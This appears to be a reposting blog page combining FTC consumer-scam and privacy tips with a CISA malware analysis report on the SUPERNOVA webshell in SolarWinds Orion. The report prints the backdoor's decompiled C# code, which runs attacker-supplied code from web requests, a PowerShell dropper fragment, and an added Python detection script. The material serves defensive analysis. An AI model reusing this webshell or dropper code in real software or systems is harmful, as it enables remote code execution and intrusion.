by Scott Muniz | Jan 29, 2021 | Security
This article was originally posted by the FTC. See the original article here.
Have you ever thought about paying for a training program to learn how to invest in real estate or start an online business? These programs can be pricey — and some make false promises about helping people make money. In fact, the FTC has sued plenty of real estate investment training and online business coaching programs that have done exactly that, while charging people thousands — or even tens of thousands — for those programs.
Pricey deceptive coaching and investment schemes often involve deceptive financing, as well. Today the FTC filed a complaint against Seed Consulting LLC, a company that claims to offer financing to aspiring entrepreneurs interested in buying a training program. But, the FTC says, Seed Consulting is not a lender and doesn’t offer any financing itself. Instead, Seed Consulting charges people $3,000 or more merely to submit credit card applications on their behalf. In addition, the FTC says, Seed Consulting improperly encouraged people to significantly overstate their income to get credit of $50,000 or more on these new cards.
You can probably predict what happened next to people who paid Seed Consulting: according to the FTC, they often ended up mired in debt with lower credit scores while Seed Consulting took in more than $10 million from their funding scheme.
So how do you protect yourself from deceptive training and financing schemes?
- Do your research before you act. Take a few minutes to search online: look for the name of the company and the words “review,” “complaint,” or “scam.”
- Be skeptical of any company that charges you a hefty sum to secure credit card financing. When such financing is warranted, you can typically obtain it directly from the credit card issuer on the Internet or via phone without any middlemen or fees.
- If a company encourages you to inflate your income on a credit application, walk away. Income information on credit applications must be truthful.
- Check out alternatives. Look at free or low-cost info on investing in real estate or starting a business before you buy a big, expensive training program. And certainly do that before racking up charges on new credit cards to pay for it.
- Talk it over with someone first. Tell someone you trust about the details of the investment training program. And tell someone how the company suggests you should finance the cost of that training.
Don’t be pressured into a quick decision. Scammers often say their offer or pricing is only available for a limited time. But deals will always be there. And remember: there’s no such thing as a sure-bet investment that has a high return but little or no risk. If someone offers you one, tell the FTC: ReportFraud.ftc.gov.
Brought to you by Dr. Ware, Microsoft Office 365 Silver Partner, Charleston SC.
by Scott Muniz | Jan 29, 2021 | Security
This article was originally posted by the FTC. See the original article here.
If you’re facing eviction for any reason, there are organizations out there who can help you. But there are also fake “organizations” and “charities” who can hurt you.
COVID-19 has created an even greater opportunity for scammers to target people — people who are just trying to get help with paying their rent or taking care of other financial needs. Scammers may call, email, or text, saying you can get money for rent. Or they may say they can get you legal help to avoid eviction. No matter what kind of help they promise, these scammers always tell you to give them money up front or hand over your personal information first. But those are dead giveaways that it’s a scam.
Whether someone you don’t know contacts you out of the blue, or you go looking for rental assistance, here are ways to protect yourself:
- Never give your Social Security, bank account, credit card, or debit card number to anyone who contacts you. And even if you’re the one reaching out, do your research on the organization first, before you share your info.
- If you look online for help with your rent, search for the name of the groups you find, plus the words “scam,” “fraud,” or “complaint,” to see what others are saying. Do that before you contact them.
- Find out about local programs that offer rental assistance and other help.
- If you’re facing eviction, you still have rights. The first step in most evictions is a written notice. Check with your local court system for more details about the eviction process and your rights. You also may qualify for free legal services and be able to speak to a lawyer to learn about your rights.
- If you spot a rental assistance scam like this, please tell the FTC at ReportFraud.ftc.gov.
by Scott Muniz | Jan 28, 2021 | Security, Technology
This article is contributed. See the original author and article here.
January 28 is Data Privacy Day (DPD), an annual effort promoting data privacy awareness and education. This year’s DPD events, sponsored by the National Cyber Security Alliance (NCSA), focus on how to Own Your Privacy.
The NCSA teaches users how to protect valuable data online, while encouraging businesses to Respect Privacy by protecting data they collect. CISA encourages users and businesses to visit NCSA’s website to learn more, including several calls to action:
For Individuals: Own Your Privacy
- Personal info is like money. Your purchase history, IP address, or location has tremendous value. Make informed decisions about whether or not to share such data with certain businesses.
- Keep tabs on your apps. Delete unused ones and keep others secure by performing updates.
- Manage your privacy and security settings. Continuously check them to limit what information you share.
For Businesses: Respect Privacy
- If you collect it, protect it. Make sure any personal data you collect is processed in a fair manner and is only collected for relevant and legitimate purposes.
- Consider adopting a privacy framework to manage risk and secure privacy within your organization.
- Assess data collection practices by evaluating which privacy regulations apply to your organization.
- Transparency builds trust. Be honest with customers about how you collect, use, and share their personal information.
- Maintain oversight of partners and vendors. You are responsible for anyone collecting and using your consumers’ personal information.
by Scott Muniz | Jan 28, 2021 | Security
This article was originally posted by the FTC. See the original article here.
Today is National Data Privacy Day, when many organizations and government agencies, including the FTC, join together to raise awareness about privacy issues and to offer tips and information. As more and more of our devices are connected and share information about us, privacy is increasingly important.
There are things you can do to help protect your privacy and limit how you share your information with others. National Data Privacy Day is the perfect time to review some of those steps you can take:
- Know what’s on your device. Do an inventory of all the applications that are on your devices. Consider deleting what you don’t use.
- Check the privacy settings. It’s a good idea to check the privacy settings of apps, devices, and online accounts periodically. You could, for example, review privacy settings when you get a notice from a company telling you that their privacy policies have changed.
- Make sure any software and applications are up to date. This includes your apps, web browsers, and operating systems. Set updates to happen automatically.
- Check the security of your home router. Make sure you’re using a router that has WPA2 or WPA3 encryption to protect the information you share over your wireless network. Public Wi-Fi is not secure, so take precautions if you need to use a public Wi-Fi hotspot.
Check out the FTC’s resources on privacy and online security for more tips and information. You can also follow the conversation on social media by searching the hashtag #DataPrivacyDay.
If you own a business, you can find information on how to protect your customers’ and employees’ privacy in this blog series.
by Scott Muniz | Jan 27, 2021 | Security, Technology
This article is contributed. See the original author and article here.
Original release date: January 27, 2021
Malware Analysis Report
10319053.r1.v1
2021-01-26
Notification
This report is provided “as is” for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.
This document is marked TLP:WHITE–Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.us-cert.gov/tlp.
Summary
Description
This report provides detailed analysis of several malicious artifacts, affecting the SolarWinds Orion product, which have been identified by the security company FireEye as SUPERNOVA. According to a SolarWinds advisory, SUPERNOVA is not embedded within the Orion platform as a supply chain attack; rather, it is placed by an attacker directly on a system that hosts SolarWinds Orion and is designed to appear as part of the SolarWinds product. CISA’s assessment is that SUPERNOVA is not part of the SolarWinds supply chain attack described in Alert AA20-352A. See the section in Microsoft’s blog titled “Additional malware discovered” for more information.
This report describes the analysis of a PowerShell script that decodes and installs SUPERNOVA, a malicious webshell backdoor. SUPERNOVA is embedded in a trojanized version of the SolarWinds Orion Web Application module called “App_Web_logoimagehandler.ashx.b6031896.dll.” The SUPERNOVA malware allows a remote operator to dynamically inject C# source code into a web portal provided via the SolarWinds software suite. The injected code is compiled and directly executed in memory.
For a downloadable copy of IOCs, see: MAR-10319053-1.v1.stix.
Submitted Files (3)
02c5a4770ee759593ec2d2ca54373b63dea5ff94da2e8b4c733f132c00fc7ea1 (AssemblyInfo__.ini)
290951fcc76b497f13dcb756883be3377cd3a4692e51350c92cac157fc87e515 (1.ps1)
c15abaf51e78ca56c0376522d699c978217bf041a3bd3c71d09193efa5717c71 (App_Web_logoimagehandler.ashx….)
Findings
290951fcc76b497f13dcb756883be3377cd3a4692e51350c92cac157fc87e515
Tags
trojan
Details
| Property | Value |
|---|---|
| Name | 1.ps1 |
| Size | 10609 bytes |
| Type | ASCII text, with very long lines |
| MD5 | 4423a4353a0e7972090413deb40d56ad |
| SHA1 | 8004d78e6934efb4dea8baf48a589c2c1ed10bf3 |
| SHA256 | 290951fcc76b497f13dcb756883be3377cd3a4692e51350c92cac157fc87e515 |
| SHA512 | 5d2dee3c8e4c6a4fa1d84e434ab0b864245fae51360e03ed7338c2b40d7c1d61aad755f8c54615197100dd3b8bfd00d33b256178123002b7c07779c257fa13db |
| ssdeep | 192:9x2OrPgH8XWECNsW4IX4SLY0tqIeZ9StIGca/HjKxnlyImIwN:Fr28XWECNsbIX4SLY0BeZ9StI9OHjMlw |
| Entropy | 4.457683 |
Antivirus
| Vendor | Detection |
|---|---|
| Microsoft Security Essentials | Trojan:MSIL/Solorigate.G!dha |
YARA Rules
No matches found.
ssdeep Matches
No matches found.
Relationships
| File | Relationship | Related file |
|---|---|---|
| 290951fcc7… | Contains | c15abaf51e78ca56c0376522d699c978217bf041a3bd3c71d09193efa5717c71 |
Description
This file is an event log that details the execution of a PowerShell script designed to Base64 decode and install a 32-bit .NET dynamic-link library (DLL) into the following location: “C:\inetpub\SolarWinds\bin\App_Web_logoimagehandler.ashx.b6031896.dll” (c15abaf51e78ca56c0376522d699c978217bf041a3bd3c71d09193efa5717c71). The DLL is patched with the SUPERNOVA webshell and is a replacement for a legitimate SolarWinds DLL.
Displayed below is a portion of the event log with the victim information redacted. It indicates the malicious PowerShell was executed by the legitimate SolarWinds application “E:\Program Files (x86)\SolarWinds\Orion\SolarWinds.BusinessLayerHost.exe.”
–Begin event log–
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";$f="C:\inetpub\SolarWinds\bin\App_Web_logoimagehandler.ashx.b6031896.dll";$bs=[Convert]::FromBase64String($b);[IO.File]::WriteAllBytes($f $bs)' 'S-1-0-0' '-' '-' '0x0000000000000000' 'E:\Program Files (x86)\SolarWinds\Orion\SolarWinds.BusinessLayerHost.exe' 'S-1-16-16384'] Computer Name: [redacted].[redacted].net Record Number: 12551353 Event Level: 0
–End event log–
c15abaf51e78ca56c0376522d699c978217bf041a3bd3c71d09193efa5717c71
Tags
backdoor, trojan
Details
| Property | Value |
|---|---|
| Name | App_Web_logoimagehandler.ashx.b6031896.dll |
| Size | 7680 bytes |
| Type | PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows |
| MD5 | 56ceb6d0011d87b6e4d7023d7ef85676 |
| SHA1 | 75af292f34789a1c782ea36c7127bf6106f595e8 |
| SHA256 | c15abaf51e78ca56c0376522d699c978217bf041a3bd3c71d09193efa5717c71 |
| SHA512 | f7eac6ab99fe45ca46417cdca36ba27560d5f8a2f37f378ba97636662595d55fa34f749716971aa96a862e37e0199eb6cb905636e6ab0123cfa089adba450629 |
| ssdeep | 192:8/SqRzbt0GBDawA5uT8wSlyDDGTBNFkQ:8/SyHKGBDax5uThDD6BNr |
| Entropy | 4.622450 |
Antivirus
| Vendor | Detection |
|---|---|
| Ahnlab | Backdoor/Win32.SunBurst |
| Antiy | Trojan/MSIL.Agent |
| Avira | TR/Sunburst.BR |
| BitDefender | Trojan.Supernova.A |
| Clamav | Win.Countermeasure.SUPERNOVA-9808999-1 |
| Comodo | Backdoor |
| Cyren | W32/Supernova.GYFL-6114 |
| ESET | a variant of MSIL/SunBurst.A trojan |
| Emsisoft | Trojan.Supernova.A (B) |
| Ikarus | Backdoor.Sunburst |
| K7 | Trojan ( 00574a531 ) |
| Lavasoft | Trojan.Supernova.A |
| McAfee | Trojan-sunburst |
| Microsoft Security Essentials | Trojan:MSIL/Solorigate.G!dha |
| NANOAV | Trojan.Win32.Sunburst.iduxaq |
| Quick Heal | Backdoor.Sunburst |
| Sophos | Mal/Sunburst-B |
| Symantec | Backdoor.SuperNova |
| Systweak | trojan-backdoor.sunburst-r |
| TrendMicro | Trojan.59AF4B5F |
| TrendMicro House Call | Trojan.59AF4B5F |
| VirusBlokAda | TScope.Trojan.MSIL |
| Zillya! | Trojan.SunBurst.Win32.3 |
YARA Rules
No matches found.
ssdeep Matches
| Score | Matching file |
|---|---|
| 100 | 5976f9a3f7dcd2c124f1664003a1bb607bc22abc2c95abe5ecd645a5dbfe2c6c |
PE Metadata
| Property | Value |
|---|---|
| Compile Date | 2020-03-24 05:16:10-04:00 |
| Import Hash | dae02f32a21e03ce65412f6e56942daa |
| Company Name | None |
| File Description | (empty) |
| Internal Name | App_Web_logoimagehandler.ashx.b6031896.dll |
| Legal Copyright | (empty) |
| Original Filename | App_Web_logoimagehandler.ashx.b6031896.dll |
| Product Name | None |
| Product Version | 0.0.0.0 |
PE Sections
| MD5 | Name | Raw Size | Entropy |
|---|---|---|---|
| 21556dbcb227ba907e33b0847b427ef4 | header | 512 | 2.597488 |
| 9002a963c87901397a986c3333d09627 | .text | 5632 | 5.285309 |
| 78888431b10a2bf283387437a750bca3 | .rsrc | 1024 | 2.583328 |
| 45ded0a8dacde15cb402adfe11b0fe3e | .reloc | 512 | 0.081539 |
Packers/Compilers/Cryptors
| Microsoft Visual C# / Basic .NET |
Relationships
| File | Relationship | Related file |
|---|---|---|
| c15abaf51e… | Contained_Within | 290951fcc76b497f13dcb756883be3377cd3a4692e51350c92cac157fc87e515 |
Description
This file is a 32-bit .NET DLL that has been identified as a modified SolarWinds plug-in. The malware patched into this plug-in has been identified as SUPERNOVA. The modification includes the “DynamicRun” export function, which is designed to accept and parse provided arguments. The arguments are expected to partially contain C# code, which the function will compile and execute directly in system memory. The purpose of this malware indicates the attacker has identified a vulnerability that allows them to supply a custom “HttpContext” data structure to the web application’s “ProcessRequest” function.
The ProcessRequest function takes an HttpContext data structure as an argument. It parses portions of the request substructure of the parent HttpContext data structure using the keys “codes”, “clazz”, “method”, and “args”. The parsed data is placed in the respective variables codes, clazz, method, and args. These four variables are then provided as arguments to the DynamicRun function described next.
The “DynamicRun” function is designed to accept C# code and then dynamically compile and execute it. The “codes” variable provided to the function contains the actual C# code. The “clazz” variable provides the class name that is used when compiling the source code. The “method” variable will contain the function name that will be called for the newly compiled class. The “args” variable will contain the arguments provided to the executed malicious class.
After parsing out and executing the provided code, the “ProcessRequest” function will continue on to call a function named “WebSettingsDAL.get_NewNOCSiteLogo.” Analysis indicates this is a valid SolarWinds function designed to render the product logo on a web application.
–Begin ProcessRequest Function–
public void ProcessRequest(HttpContext context)
{
    // SUPERNOVA addition: pull C# source and invocation details from the request and run them.
    try
    {
        string codes = context.Request["codes"];
        string clazz = context.Request["clazz"];
        string method = context.Request["method"];
        string[] args = context.Request["args"].Split('\n');
        context.Response.ContentType = "text/plain";
        context.Response.Write(this.DynamicRun(codes, clazz, method, args));
    }
    catch (Exception ex)
    {
        // Errors are swallowed so the handler falls through to the legitimate logo logic below.
    }
    // Legitimate SolarWinds logo-handler logic: serve the image selected by the "id" query parameter.
    NameValueCollection queryString = HttpUtility.ParseQueryString(context.Request.Url.Query);
    try
    {
        string str1 = queryString["id"];
        string s;
        if (!(str1 == "SitelogoImage"))
        {
            if (!(str1 == "SiteNoclogoImage"))
                throw new ArgumentOutOfRangeException(queryString["id"]);
            s = WebSettingsDAL.get_NewNOCSiteLogo();
        }
        else
            s = WebSettingsDAL.get_NewSiteLogo();
        byte[] buffer = Convert.FromBase64String(s);
        if ((buffer == null || buffer.Length == 0) && File.Exists(HttpContext.Current.Server.MapPath("//NetPerfMon//images//NoLogo.gif")))
            buffer = File.ReadAllBytes(HttpContext.Current.Server.MapPath("//NetPerfMon//images//NoLogo.gif"));
        // Pick a content type from the image magic bytes (JPEG, GIF or PNG).
        string str2 = buffer.Length < 2 || buffer[0] != byte.MaxValue || buffer[1] != (byte) 216 ? (buffer.Length < 3 || buffer[0] != (byte) 71 || (buffer[1] != (byte) 73 || buffer[2] != (byte) 70) ? (buffer.Length < 8 || buffer[0] != (byte) 137 || (buffer[1] != (byte) 80 || buffer[2] != (byte) 78) || (buffer[3] != (byte) 71 || buffer[4] != (byte) 13 || (buffer[5] != (byte) 10 || buffer[6] != (byte) 26)) || buffer[7] != (byte) 10 ? "image/jpeg" : "image/png") : "image/gif") : "image/jpeg";
        context.Response.OutputStream.Write(buffer, 0, buffer.Length);
        context.Response.ContentType = str2;
        context.Response.Cache.SetCacheability(HttpCacheability.Private);
        context.Response.StatusDescription = "OK";
        context.Response.StatusCode = 200;
        return;
    }
    catch (Exception ex)
    {
        LogoImageHandler._log.Error((object) "Unexpected error trying to provide logo image for the page.", ex);
    }
    context.Response.Cache.SetCacheability(HttpCacheability.NoCache);
    context.Response.StatusDescription = "NO IMAGE";
    context.Response.StatusCode = 500;
}
–End ProcessRequest Function–
–Begin DynamicRun Function–
public string DynamicRun(string codes, string clazz, string method, string[] args)
{
    // Compile the supplied source in memory with the .NET C# code provider.
    ICodeCompiler compiler = new CSharpCodeProvider().CreateCompiler();
    CompilerParameters options = new CompilerParameters();
    options.ReferencedAssemblies.Add("System.dll");
    options.ReferencedAssemblies.Add("System.ServiceModel.dll");
    options.ReferencedAssemblies.Add("System.Data.dll");
    options.ReferencedAssemblies.Add("System.Runtime.dll");
    options.GenerateExecutable = false;
    options.GenerateInMemory = true;
    string source = codes;
    CompilerResults compilerResults = compiler.CompileAssemblyFromSource(options, source);
    if (compilerResults.Errors.HasErrors)
    {
        // ISSUE: reference to a compiler-generated field
        // ISSUE: reference to a compiler-generated field
        // ISSUE: reference to a compiler-generated field
        // ISSUE: method pointer
        string.Join(Environment.NewLine, (IEnumerable<string>) Enumerable.Select<CompilerError, string>((IEnumerable<M0>) compilerResults.Errors.Cast<CompilerError>(), (Func<M0, M1>) (LogoImageHandler.\u003C\u003Ec.\u003C\u003E9__3_0 ?? (LogoImageHandler.\u003C\u003Ec.\u003C\u003E9__3_0 = new Func<CompilerError, string>((object) LogoImageHandler.\u003C\u003Ec.\u003C\u003E9, __methodptr(\u003CDynamicRun\u003Eb__3_0))))));
        Console.WriteLine("error");
        return compilerResults.Errors.ToString();
    }
    // Instantiate the requested class from the compiled assembly and invoke the named method.
    object instance = compilerResults.CompiledAssembly.CreateInstance(clazz);
    return (string) instance.GetType().GetMethod(method).Invoke(instance, (object[]) args);
}
–End DynamicRun Function–
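As an added detection example (not part of the CISA report), the following Python scans constructed IIS W3C log lines for requests to the logo handler that carry the SUPERNOVA request keys named above, and constructed PowerShell script-block records for the Base64-decode-and-write installer pattern shown in the event log for 1.ps1. The log field order, host names and addresses are assumptions.

```python
import re
from urllib.parse import parse_qs

# Request keys the trojanized ProcessRequest reads before calling DynamicRun (see the MAR above).
# The legitimate handler uses only the "id" query parameter.
SUPERNOVA_KEYS = {"codes", "clazz", "method", "args"}
HANDLER = "logoimagehandler.ashx"

# Constructed IIS W3C log excerpt (hypothetical hosts and addresses), assuming the field order
# declared in the #Fields line. Query values are placeholders, not real payloads.
SAMPLE_IIS_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip sc-status
2021-01-20 10:01:02 10.0.0.5 GET /Orion/LogoImageHandler.ashx id=SitelogoImage 443 - 10.0.0.9 200
2021-01-20 10:01:07 10.0.0.5 GET /Orion/Summary.aspx - 443 admin 10.0.0.9 200
2021-01-20 10:02:13 10.0.0.5 GET /Orion/LogoImageHandler.ashx codes=X&clazz=Y&method=Z&args=W 443 - 192.0.2.10 200
"""

# Installer pattern from the event log above: Base64-decode a blob and write the bytes into the
# SolarWinds web "bin" directory. Backslashes are matched as they appear on disk.
DECODE_AND_WRITE = re.compile(r"FromBase64String\(.*?WriteAllBytes\(", re.IGNORECASE | re.DOTALL)
SOLARWINDS_BIN_DLL = re.compile(r"""[A-Z]:\\inetpub\\SolarWinds\\bin\\[^"'\s]+\.dll""", re.IGNORECASE)

# Constructed PowerShell script-block records as (parent process, script text). The Base64 blob is
# replaced by a placeholder; the real one in the report is thousands of characters long.
SAMPLE_PS_EVENTS = [
    (r"E:\Program Files (x86)\SolarWinds\Orion\SolarWinds.BusinessLayerHost.exe",
     r'$b="AAAA_PLACEHOLDER";$f="C:\inetpub\SolarWinds\bin\App_Web_logoimagehandler.ashx.b6031896.dll";'
     r'$bs=[Convert]::FromBase64String($b);[IO.File]::WriteAllBytes($f,$bs)'),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r'Get-ChildItem "C:\inetpub\SolarWinds\bin" | Measure-Object'),
]


def parse_iis_line(line):
    """Split one W3C line into the fields needed here; None for comment, blank or short lines."""
    if not line.strip() or line.startswith("#"):
        return None
    f = line.split()
    if len(f) < 9:
        return None
    return {"method": f[3], "stem": f[4], "query": "" if f[5] == "-" else f[5], "client": f[8]}


def supernova_request_hits(log_text):
    """Return one record per request to the logo handler whose query string carries any of the
    SUPERNOVA keys. Caveat: Request["codes"] also reads POST bodies, which IIS does not log, so a
    POST to this handler deserves review even when its query string looks clean."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_iis_line(line)
        if rec is None or HANDLER not in rec["stem"].lower():
            continue
        keys = {k.lower() for k in parse_qs(rec["query"], keep_blank_values=True)}
        found = keys & SUPERNOVA_KEYS
        if found:
            hits.append({"client": rec["client"], "method": rec["method"], "keys": sorted(found)})
    return hits


def powershell_dropper_hits(events):
    """Flag script blocks that decode Base64 and write a DLL into the SolarWinds bin directory,
    recording which process ran them (the report shows SolarWinds.BusinessLayerHost.exe)."""
    hits = []
    for proc, script in events:
        if DECODE_AND_WRITE.search(script):
            m = SOLARWINDS_BIN_DLL.search(script)
            if m:
                hits.append({"process": proc, "target": m.group(0)})
    return hits


if __name__ == "__main__":
    for h in supernova_request_hits(SAMPLE_IIS_LOG):
        print("webshell request:", h)
    for h in powershell_dropper_hits(SAMPLE_PS_EVENTS):
        print("dropper script:", h)
```

A hit from either function is a lead for comparing the on-disk App_Web_logoimagehandler.ashx DLL against the hashes listed in this report.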
Screenshots

Figure 1 – Screenshot of the modification.
02c5a4770ee759593ec2d2ca54373b63dea5ff94da2e8b4c733f132c00fc7ea1
Details
| Property | Value |
|---|---|
| Name | AssemblyInfo__.ini |
| Size | 252 bytes |
| Type | data |
| MD5 | a73fd263da660c56650426eff8299c7d |
| SHA1 | ab9ed07e59e1e284914ad6d6be74a0985dff703a |
| SHA256 | 02c5a4770ee759593ec2d2ca54373b63dea5ff94da2e8b4c733f132c00fc7ea1 |
| SHA512 | 9c65aecd80510244a16335a925b2b3b722d56a1c9fdc06267aee5c576b4346d9e60c03bfbf3c67729c6bd5d0fc3511fb479be5aa662cd322bd2f238129a28bd0 |
| ssdeep | 6:cP6SlI9Dol1BnUfKr+2kiRWa6SlI9Dol1Bne:s1qD41hKKr+2NRWa1qD41he |
| Entropy | 3.389300 |
Antivirus
No matches found.
YARA Rules
No matches found.
ssdeep Matches
No matches found.
Description
This file contains the following text:
–Begin text–
App_Web_logoimagehandler.ashx.b6031896,0.0.0.0,, file:///C:/InetPub/SolarWinds/bin/App_Web_logoimagehandler.ashx.b6031896.dll
–End text–
Relationship Summary
| File | Relationship | Related file |
|---|---|---|
| 290951fcc7… | Contains | c15abaf51e78ca56c0376522d699c978217bf041a3bd3c71d09193efa5717c71 |
| c15abaf51e… | Contained_Within | 290951fcc76b497f13dcb756883be3377cd3a4692e51350c92cac157fc87e515 |
Recommendations
CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization’s systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.
- Maintain up-to-date antivirus signatures and engines.
- Keep operating system patches up-to-date.
- Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
- Restrict users’ ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
- Enforce a strong password policy and implement regular password changes.
- Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
- Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
- Disable unnecessary services on agency workstations and servers.
- Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its “true file type” (i.e., the extension matches the file header).
- Monitor users’ web browsing habits; restrict access to sites with unfavorable content.
- Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
- Scan all software downloaded from the Internet prior to executing.
- Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).
Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, “Guide to Malware Incident Prevention & Handling for Desktops and Laptops”.
Contact Information
CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://www.cisa.gov/forms/feedback/
Document FAQ
What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.
What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.
Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or CISA Service Desk.
Can I submit malware to CISA? Malware samples can be submitted via three methods:
CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA’s homepage at www.cisa.gov.
This product is provided subject to this Notification and this Privacy & Use policy.
by Scott Muniz | Jan 27, 2021 | Security
This article was originally posted by the FTC. See the original article here.
You may know the FTC for its consumer information, and for taking action against shady companies that violate the law. But did you know the FTC returns millions of dollars to people because of those actions? Last year, the FTC's cases returned $483 million to people nationwide and in 64 countries.